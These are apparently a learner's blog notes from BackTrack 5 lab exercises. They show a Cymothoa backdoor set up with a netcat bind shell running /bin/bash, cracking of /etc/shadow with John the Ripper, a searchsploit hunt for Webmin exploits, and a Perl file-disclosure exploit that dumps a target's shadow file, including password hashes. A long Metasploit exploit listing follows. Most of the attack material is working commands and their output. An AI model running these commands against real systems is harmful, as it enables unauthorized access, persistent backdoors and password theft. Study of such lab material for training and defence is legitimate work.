Senin, 30 Januari 2012

Cymothoa in to ubuntu using nc

open the tools cymothoa which located in Apps - Maintaining Access - OS Backdoors - Cymothoa

typed a command root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 6666 -e> cy /bin/bash

open the cymothoa now

cymothoain ubuntu
command ps -aux

 I do it with command ./cymothoa -p 1154 -s 0 -y 6666 and the result is

PRIVILEGE ESCALATION CRACK etc/shadow WITH JOHN THE RIPPER


open aplication john the reipper through menu BT-Apps-Privilege Escalation-Password Attacks-Offline Atacks-John The Ripper
root@bt:/pentest/passwords/john# john
John the Ripper password cracker, ver: 1.7.8-jumbo-8 [linux-x86-sse2]
Copyright (c) 1996-2011 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]
--config=FILE             use FILE instead of john.conf or john.ini
--single[=SECTION]        "single crack" mode                                          
--wordlist=FILE --stdin   wordlist mode, read words from FILE or stdin
                --pipe    like --stdin, but bulk reads, and allows rules               
--encoding=NAME           the input data is in a 'non-standard' character.
                          encoding. NAME = utf-8, koi8-r, and others. For a            
                          full list, use --encoding=LIST
--rules[=SECTION]         enable word mangling rules for wordlist mode                 
--incremental[=MODE]      "incremental" mode [using section MODE]
--markov[=LEVEL[:opts]]   "Markov" mode (see documentation)                            
--external=MODE           external mode or word filter
--stdout[=LENGTH]         just output candidate passwords [cut at LENGTH]
--restore[=NAME]          restore an interrupted session [called NAME]
--session=NAME            give a new session the NAME
--status[=NAME]           print status of a session [called NAME]
--make-charset=FILE       make a charset file. It will be overwritten
--show[=LEFT]             show cracked passwords [if =LEFT, then uncracked]
--test[=TIME]             run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..]      load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..]    load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX]    load salts with[out] COUNT [to MAX] hashes
--pot=NAME                pot file to use
--format=NAME             force hash type NAME: des/bsdi/md5/bf/afs/lm/bfegg
                          dmd5/dominosec/epi/hdaa/ipb2/krb4/krb5/mschapv2
                          mysql-fast/mysql/netlm/netlmv2/netntlm/netntlmv2
                          nethalflm/ssha/nsldap/md5ns/nt/openssha/phps/po/xsha
                          crc32/hmac-md5/lotus5/md4-gen/mediawiki/mscash/mscash2
                          mskrb5/mssql/mssql05/mysql-sha1/oracle11/oracle
                          phpass-md5/pix-md5/pkzip/raw-md4/raw-md5/raw-sha1
                          raw-md5u/salted-sha1/sapb/sapg/sha1-gen/trip
                          raw-sha224/raw-sha256/raw-sha384/raw-sha512/xsha512
                          hmailserver/sybasease/crypt/ssh/pdf/rar/zip/dummy
                          dynamic_n
--subformat=LIST          get a listing of all 'dynamic_n' formats
--save-memory=LEVEL       enable memory saving, at LEVEL 1..3
--mem-file-size=SIZE      size threshold for wordlist preload (default 5 MB)
--field-separator-char=C  use 'C' instead of the ':' in input and pot files
--fix-state-delay=N       performance tweak, see documentation
--nolog                   disables creation and writing to john.log file
--crack-status            emit a status line whenever a password is cracked
--plugin=NAME[,..]        load this (these) dynamic plugin(s)



 but previously we save the file first exploits etc / shadoaw as below.


 type the command
 root@bt:/pentest/passwords/john# john /home/etcshadow
waiting the folloeing in loading prosses





PRIVILEGE ESCALATION


Privilege Escalation
ip Adrress or ip target first scanned with nessus
after completion of a scan with nessus

 double click on the total scan,and will appear as display below


select protocol tcp choose the number of ports 10000
open and select name webmin, and the results are as below our live analysis

after that we seek etc shadow to exploit DB 
 
root@bt:/pentest/exploits/exploitdb# ls
files.csv  platforms  searchsploit
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb# ls -lia
total 2300
1969260 drwxr-xr-x  4 root root    4096 2012-01-16 23:03 .
1967574 drwxr-xr-x  9 root root    4096 2011-08-17 02:42 ..
1969268 -rwxr-xr-x  1 root root 2316060 2012-01-16 23:03 files.csv
2101860 drwxr-xr-x 40 root root   20480 2012-01-02 14:48 platforms
1969269 -rwxr-xr-x  1 root root    1124 2011-06-12 02:05 searchsploit
2101859 drwxr-xr-x  6 root root    4096 2012-01-16 23:03 .svn
root@bt:/pentest/exploits/exploitdb# ./searchsploit  httpd
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Apache HTTPd Arbitrary Long HTTP Headers DoS                                /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)                    /linux/dos/371.c
Sumus 0.2.2 httpd Remote Buffer Overflow Exploit                            /linux/remote/940.c
zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS                         /linux/dos/1746.pl
RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit        /windows/remote/2328.php
SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit                           /windows/remote/2482.pl
corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit                  /linux/remote/4243.c
EDraw Office Viewer Component 5.1  HttpDownloadFile() Insecure Method       /windows/remote/4290.html
Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit                   /multiple/remote/4391.c
Airsensor M520 HTTPD Remote Preauth DoS / BOF PoC                           /hardware/dos/4426.pl
Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit                   /linux/remote/4437.c
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities                        /windows/remote/4700.txt
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities                        /windows/remote/4700.txt
Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit                /windows/dos/4717.py
RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit                 /windows/remote/4747.vbs
Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability          /multiple/remote/5215.txt
VLC 0.8.6d httpd_FileCallBack Remote Format String Exploit                  /windows/remote/5519.c
Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC                  /hardware/dos/6394.pl
fhttpd 0.4.2 un64() Remote Denial of Service Exploit                        /linux/dos/6493.pl
Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit                 /hardware/dos/7535.php
EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln             /windows/remote/7762.html
SW-HTTPD Server 0.x Remote Denial of Service Exploit                        /multiple/dos/8245.c
httpdx <= 0.5b Multiple Remote Denial of Service Vulnerabilities            /windows/dos/8712.txt
httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)                   /windows/remote/8716.py
httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)                    /windows/remote/8732.py
Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)    /multiple/remote/8786.txt
httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit        /windows/remote/8897.c
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability               /hardware/remote/9209.txt
httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit        /windows/dos/9657.pl
httpdx <= 1.4.6b source disclosure                                          /windows/webapps/9885.txt
httpdx 1.4 h_handlepeer BoF                                                 /windows/remote/9886.txt
httpdx 1.4 Get Request Buffer Overflow                                      /windows/remote/10053.txt
OrzHTTPd Format String Exploit                                              /linux/remote/10282.py
httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)                     /windows/dos/11343.py
RCA DCM425 Cable Modem micro_httpd DoS/PoC                                  /hardware/dos/11597.py
httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)         /windows/dos/11734.py
Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC                    /hardware/dos/13774.pl
Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC      /windows/dos/14683.py
httpdASM 0.92 Directory Traversal                                           /windows/remote/15861.txt
Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download                       /windows/remote/16075.pl
HTTPDX tolog() Function Format String Vulnerability                         /windows/remote/16732.rb
SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)                    /win32/remote/16759.rb
HTTPDX tolog() Function Format String Vulnerability                         /windows/remote/16794.rb
HTTPDX h_handlepeer() Function Buffer Overflow                              /windows/remote/16799.rb
jHTTPd 0.1a Directory Traversal Vulnerability                               /multiple/remote/17068.py
Simple HTTPd 1.42 Denial of Servive Exploit                                 /windows/dos/17658.py
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability          /windows/remote/17669.py
Apache httpd Remote Denial of Service (memory exhaustion)                   /multiple/dos/17696.pl
FleaHttpd Remote Denial Of Service Exploit                                  /linux/dos/18120.py
lighttpd Denial of Service Vulnerability PoC                                /linux/dos/18295.
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                 Path                                                                                      
--------------------------------------------------------------------------- -------------------------                                                                  
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl                                                                    
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi                                                                   
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl                                                                    
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php                                                                  
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl                                                                   
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt                                                                      
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt                                                                      
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt                                                                      
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt                                                                       
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt                                                                      
root@bt:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~
root@bt:/pentest/exploits/exploitdb# cd
root@bt:~# ls
2017.pl  5709.pl  Desktop  VirtualBox VMs  xGPS Manager
root@bt:~# ./2017.pl
bash: ./2017.pl: /usr/bin/perl^M: bad interpreter: No such file or directory
root@bt:~# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@bt:~# perl 2017.pl 192.168.0.112 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.112 on port 10000!
FILENAME:  /etc/shadow

 the results of  etc shadow 


 FILE CONTENT STARTED

 -----------------------------------

root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

daemon:*:14040:0:99999:7:::

bin:*:14040:0:99999:7:::

sys:*:14040:0:99999:7:::

sync:*:14040:0:99999:7:::

games:*:14040:0:99999:7:::

man:*:14040:0:99999:7:::

lp:*:14040:0:99999:7:::

mail:*:14040:0:99999:7:::

news:*:14040:0:99999:7:::

uucp:*:14040:0:99999:7:::

proxy:*:14040:0:99999:7:::

www-data:*:14040:0:99999:7:::

backup:*:14040:0:99999:7:::

list:*:14040:0:99999:7:::

irc:*:14040:0:99999:7:::

gnats:*:14040:0:99999:7:::

nobody:*:14040:0:99999:7:::

dhcp:!:14040:0:99999:7:::

syslog:!:14040:0:99999:7:::

klog:!:14040:0:99999:7:::

mysql:!:14040:0:99999:7:::

sshd:!:14040:0:99999:7:::

vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

 -------------------------------------


Jumat, 27 Januari 2012

EXPLOIT WIN XP3 USING BACKTRACK 5

open my cnsole in bt 5
root@bt:~# msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 14 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 14 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306
msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow
   dialup/multi/login/manyargs                                    2001-12-12       good       System V Derived /bin/login Extraneous Arguments Buffer Overflow
   freebsd/ftp/proftp_telnet_iac                                  2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   freebsd/samba/trans2open                                       2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   freebsd/tacacs/xtacacsd_report                                 2008-01-08       average    XTACACSD <= 4.1.2 report() Buffer Overflow
   freebsd/telnet/telnet_encrypt_keyid                            2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer Overflow
   hpux/lpd/cleanup_exec                                          2002-08-28       excellent  HP-UX LPD Command Execution
   irix/lpd/tagprinter_exec                                       2001-09-01       excellent  Irix LPD tagprinter Command Execution
   linux/ftp/proftp_sreplace                                      2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   linux/ftp/proftp_telnet_iac                                    2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   linux/games/ut2004_secure                                      2004-06-18       good       Unreal Tournament 2004 "secure" Overflow (Linux)
   linux/http/alcatel_omnipcx_mastercgi_exec                      2007-09-09       manual     Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
   linux/http/ddwrt_cgibin_exec                                   2009-07-20       excellent  DD-WRT HTTP Daemon Arbitrary Command Execution
   linux/http/gpsd_format_string                                  2005-05-25       average    Berlios GPSD Format String Vulnerability
   linux/http/linksys_apply_cgi                                   2005-09-13       great      Linksys WRT54 Access Point apply.cgi Buffer Overflow
   linux/http/peercast_url                                        2006-03-08       average    PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
   linux/http/piranha_passwd_exec                                 2000-04-04       excellent  RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
   linux/ids/snortbopre                                           2005-10-18       good       Snort Back Orifice Pre-Preprocessor Remote Exploit
   linux/imap/imap_uw_lsub                                        2000-04-16       good       UoW IMAP server LSUB Buffer Overflow
   linux/madwifi/madwifi_giwscan_cb                               2006-12-08       average    Madwifi SIOCGIWSCAN Buffer Overflow
   linux/misc/accellion_fta_mpipe2                                2011-02-07       excellent  Accellion File Transfer Appliance MPIPE2 Command Execution
   linux/misc/drb_remote_codeexec                                 2011-03-23       excellent  Distributed Ruby Send instance_eval/syscall Code Execution
   linux/misc/gld_postfix                                         2005-04-12       good       GLD (Greylisting Daemon) Postfix Buffer Overflow
   linux/misc/hplip_hpssd_exec                                    2007-10-04       excellent  hplip hpssd.py From Address Arbitrary Command Execution
   linux/misc/ib_inet_connect                                     2007-10-03       good       Borland InterBase INET_connect() Buffer Overflow
   linux/misc/ib_jrd8_create_database                             2007-10-03       good       Borland InterBase jrd8_create_database() Buffer Overflow
   linux/misc/ib_open_marker_file                                 2007-10-03       good       Borland InterBase open_marker_file() Buffer Overflow
   linux/misc/ib_pwd_db_aliased                                   2007-10-03       good       Borland InterBase PWD_db_aliased() Buffer Overflow
   linux/misc/lprng_format_string                                 2000-09-25       normal     LPRng use_syslog Remote Format String Vulnerability
   linux/misc/netsupport_manager_agent                            2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   linux/mysql/mysql_yassl_getname                                2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
   linux/mysql/mysql_yassl_hello                                  2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
   linux/pop3/cyrus_pop3d_popsubfolders                           2006-05-21       normal     Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
   linux/pptp/poptop_negative_read                                2003-04-09       great      Poptop Negative Read Overflow
   linux/proxy/squid_ntlm_authenticate                            2004-06-08       great      Squid NTLM Authenticate Overflow
   linux/samba/chain_reply                                        2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   linux/samba/lsa_transnames_heap                                2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   linux/samba/trans2open                                         2003-04-07       great      Samba trans2open Overflow (Linux x86)
   linux/telnet/telnet_encrypt_keyid                              2011-12-23       great      Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
   multi/browser/firefox_escape_retval                            2009-07-13       normal     Firefox 3.5 escape() Return Value Memory Corruption
   multi/browser/firefox_queryinterface                           2006-02-02       normal     Firefox location.QueryInterface() Code Execution
   multi/browser/itms_overflow                                    2009-06-01       great      Apple OS X iTunes 8.1.1 ITMS Overflow
   multi/browser/java_calendar_deserialize                        2008-12-03       excellent  Sun Java Calendar Deserialization Exploit
   multi/browser/java_getsoundbank_bof                            2009-11-04       great      Sun Java JRE getSoundbank file:// URI Buffer Overflow
   multi/browser/java_rhino                                       2011-10-18       excellent  Java Applet Rhino Script Engine Remote Code Execution
   multi/browser/java_rmi_connection_impl                         2010-03-31       excellent  Java RMIConnectionImpl Deserialization Privilege Escalation Exploit
   multi/browser/java_setdifficm_bof                              2009-11-04       great      Sun Java JRE AWT setDiffICM Buffer Overflow
   multi/browser/java_signed_applet                               1997-02-19       excellent  Java Signed Applet Social Engineering Code Execution
   multi/browser/java_trusted_chain                               2010-03-31       excellent  Java Statement.invoke() Trusted Method Chain Exploit
   multi/browser/mozilla_compareto                                2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
   multi/browser/mozilla_navigatorjava                            2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
   multi/browser/opera_configoverwrite                            2007-03-05       excellent  Opera 9 Configuration Overwrite
   multi/browser/opera_historysearch                              2008-10-23       excellent  Opera historysearch XSS
   multi/browser/qtjava_pointer                                   2007-04-23       excellent  Apple QTJava toQTPointer() Arbitrary Memory Access
   multi/fileformat/adobe_u3d_meshcont                            2009-10-13       good       Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
   multi/fileformat/maple_maplet                                  2010-04-26       excellent  Maple Maplet File Creation and Command Execution
   multi/fileformat/peazip_command_injection                      2009-06-05       excellent  PeaZip <= 2.6.1 Zip Processing Command Injection
   multi/ftp/wuftpd_site_exec_format                              2000-06-22       great      wu-ftpd SITE EXEC/INDEX Format String Vulnerability
   multi/handler                                                                   manual     Generic Payload Handler
   multi/http/axis2_deployer                                      2010-12-30       excellent  Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
   multi/http/familycms_less_exec                                 2011-11-29       excellent  Family Connections less.php Remote Command Execution
   multi/http/freenas_exec_raw                                    2010-11-06       great      FreeNAS exec_raw.php Arbitrary Command Execution
   multi/http/glassfish_deployer                                  2011-08-04       excellent  Sun/Oracle GlassFish Server Authenticated Code Execution
   multi/http/jboss_bshdeployer                                   2010-04-26       excellent  JBoss JMX Console Beanshell Deployer WAR upload and deployment
   multi/http/jboss_deploymentfilerepository                      2010-04-26       excellent  JBoss Java Class DeploymentFileRepository WAR deployment
   multi/http/jboss_maindeployer                                  2007-02-20       excellent  JBoss JMX Console Deployer Upload and Execute
   multi/http/op5_license                                         2012-01-05       excellent  OP5 license.php Remote Command Execution
   multi/http/op5_welcome                                         2012-01-05       excellent  OP5 welcome Remote Command Execution
   multi/http/phpldapadmin_query_engine                           2011-10-24       excellent  phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection
   multi/http/phpscheduleit_start_date                            2008-10-01       excellent  phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
   multi/http/plone_popen2                                        2011-10-04       excellent  Plone and Zope Remote CMD Injection Exploit
   multi/http/pmwiki_pagelist                                     2011-11-09       excellent  PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit
   multi/http/sit_file_upload                                     2011-11-10       excellent  Support Incident Tracker <= 3.65 Remote Command Execution
   multi/http/snortreport_exec                                    2011-09-19       excellent  Snortreport nmap.php/nbtscan.php Remote Command Execution
   multi/http/splunk_mappy_exec                                   2011-12-12       excellent  Splunk Search Remote Code Execution
   multi/http/spree_search_exec                                   2011-10-05       excellent  Spreecommerce 0.60.1 Arbitrary Command Execution
   multi/http/spree_searchlogic_exec                              2011-04-19       excellent  Spreecommerce < 0.50.0 Arbitrary Command Execution
   multi/http/struts_code_exec                                    2010-07-13       excellent  Apache Struts < 2.2.0 Remote Command Execution
   multi/http/sun_jsws_dav_options                                2010-01-20       great      Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
   multi/http/tomcat_mgr_deploy                                   2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   multi/http/traq_plugin_exec                                    2011-12-12       excellent  Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit
   multi/misc/java_rmi_server                                     2011-10-15       excellent  Java RMI Server Insecure Default Configuration Java Code Execution
   multi/misc/openview_omniback_exec                              2001-02-28       excellent  HP OpenView OmniBack II Command Execution
   multi/misc/veritas_netbackup_cmdexec                           2004-10-21       excellent  VERITAS NetBackup Remote Command Execution
   multi/misc/wireshark_lwres_getaddrbyname                       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   multi/misc/wireshark_lwres_getaddrbyname_loop                  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
   multi/misc/zend_java_bridge                                    2011-03-28       great      Zend Server Java Bridge Arbitrary Java Code Execution
   multi/ntp/ntp_overflow                                         2001-04-04       good       NTP daemon readvar Buffer Overflow
   multi/php/php_unserialize_zval_cookie                          2007-03-04       average    PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
   multi/realserver/describe                                      2002-12-20       great      RealServer Describe Buffer Overflow
   multi/samba/nttrans                                            2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   multi/samba/usermap_script                                     2007-05-14       excellent  Samba "username map script" Command Execution
   multi/svn/svnserve_date                                        2004-05-19       average    Subversion Date Svnserve
   multi/wyse/hagent_untrusted_hsdata                             2009-07-10       excellent  Wyse Rapport Hagent Fake Hserver Command Execution
   netware/smb/lsass_cifs                                         2007-01-21       average    Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
   netware/sunrpc/pkernel_callit                                  2009-09-30       good       NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
   osx/afp/loginext                                               2004-05-03       average    AppleFileServer LoginExt PathName Overflow
   osx/arkeia/type77                                              2005-02-18       average    Arkeia Backup Client Type 77 Overflow (Mac OS X)
   osx/armle/safari_libtiff                                       2006-08-01       good       iPhone MobileSafari LibTIFF Buffer Overflow
   osx/browser/safari_file_policy                                 2011-10-12       normal     Apple Safari file:// Arbitrary Code Execution
   osx/browser/safari_libtiff                                     2006-08-01       good       iPhone MobileSafari LibTIFF Buffer Overflow
   osx/browser/safari_metadata_archive                            2006-02-21       excellent  Safari Archive Metadata Command Execution
   osx/browser/software_update                                    2007-12-17       excellent  Apple OS X Software Update Command Execution
   osx/email/mailapp_image_exec                                   2006-03-01       manual     Mail.app Image Attachment Command Execution
   osx/email/mobilemail_libtiff                                   2006-08-01       good       iPhone MobileMail LibTIFF Buffer Overflow
   osx/ftp/webstar_ftp_user                                       2004-07-13       average    WebSTAR FTP Server USER Overflow
   osx/http/evocam_webserver                                      2010-06-01       average    MacOS X EvoCam HTTP GET Buffer Overflow
   osx/mdns/upnp_location                                         2007-05-25       average    Mac OS X mDNSResponder UPnP Location Overflow
   osx/misc/ufo_ai                                                2009-10-28       average    UFO: Alien Invasion IRC Client Buffer Overflow Exploit
   osx/rtsp/quicktime_rtsp_content_type                           2007-11-23       average    MacOS X QuickTime RTSP Content-Type Overflow
   osx/samba/lsa_transnames_heap                                  2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   osx/samba/trans2open                                           2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   solaris/dtspcd/heap_noir                                       2002-07-10       great      Solaris dtspcd Heap Overflow
   solaris/lpd/sendmail_exec                                      2001-08-31       excellent  Solaris LPD Command Execution
   solaris/samba/lsa_transnames_heap                              2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   solaris/samba/trans2open                                       2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   solaris/sunrpc/sadmind_adm_build_path                          2008-10-14       great      Sun Solaris sadmind adm_build_path() Buffer Overflow
   solaris/sunrpc/sadmind_exec                                    2003-09-13       excellent  Solaris sadmind Command Execution
   solaris/sunrpc/ypupdated_exec                                  1994-12-12       excellent  Solaris ypupdated Command Execution
   solaris/telnet/fuser                                           2007-02-12       excellent  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
   solaris/telnet/ttyprompt                                       2002-01-18       excellent  Solaris in.telnetd TTYPROMPT Buffer Overflow
   unix/ftp/proftpd_133c_backdoor                                 2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   unix/ftp/vsftpd_234_backdoor                                   2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution
   unix/http/contentkeeperweb_mimencode                           2009-02-25       excellent  ContentKeeper Web Remote Command Execution
   unix/http/ctek_skyrouter                                       2011-09-08       average    CTEK SkyRouter 4200 and 4300 Command Execution
   unix/http/lifesize_room                                        2011-07-13       excellent  LifeSize Room Command Injection
   unix/irc/unreal_ircd_3281_backdoor                             2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution
   unix/misc/distcc_exec                                          2002-02-01       excellent  DistCC Daemon Command Execution
   unix/misc/spamassassin_exec                                    2006-06-06       excellent  SpamAssassin spamd Remote Command Execution
   unix/misc/zabbix_agent_exec                                    2009-09-10       excellent  Zabbix Agent net.tcp.listen Command Injection
   unix/smtp/clamav_milter_blackhole                              2007-08-24       excellent  ClamAV Milter Blackhole-Mode Remote Code Execution
   unix/smtp/exim4_string_format                                  2010-12-07       excellent  Exim4 <= 4.69 string_format Function Heap Buffer Overflow
   unix/webapp/awstats_configdir_exec                             2005-01-15       excellent  AWStats configdir Remote Command Execution
   unix/webapp/awstats_migrate_exec                               2006-05-04       excellent  AWStats migrate Remote Command Execution
   unix/webapp/awstatstotals_multisort                            2008-08-26       excellent  AWStats Totals =< v1.14 multisort Remote Command Execution
   unix/webapp/barracuda_img_exec                                 2005-09-01       excellent  Barracuda IMG.PL Remote Command Execution
   unix/webapp/base_qry_common                                    2008-06-14       excellent  BASE base_qry_common Remote File Include
   unix/webapp/cacti_graphimage_exec                              2005-01-15       excellent  Cacti graph_view.php Remote Command Execution
   unix/webapp/cakephp_cache_corruption                           2010-11-15       excellent  CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
   unix/webapp/citrix_access_gateway_exec                         2010-12-21       excellent  Citrix Access Gateway Command Execution
   unix/webapp/coppermine_piceditor                               2008-01-30       excellent  Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution
   unix/webapp/dogfood_spell_exec                                 2009-03-03       excellent  Dogfood CRM spell.php Remote Command Execution
   unix/webapp/generic_exec                                       1993-11-14       excellent  Generic Web Application Unix Command Execution
   unix/webapp/google_proxystylesheet_exec                        2005-08-16       excellent  Google Appliance ProxyStyleSheet Command Execution
   unix/webapp/guestbook_ssi_exec                                 1999-11-05       excellent  Matt Wright guestbook.pl Arbitrary Command Execution
   unix/webapp/joomla_tinybrowser                                 2009-07-22       excellent  Joomla 1.5.12 TinyBrowser File Upload Code Execution
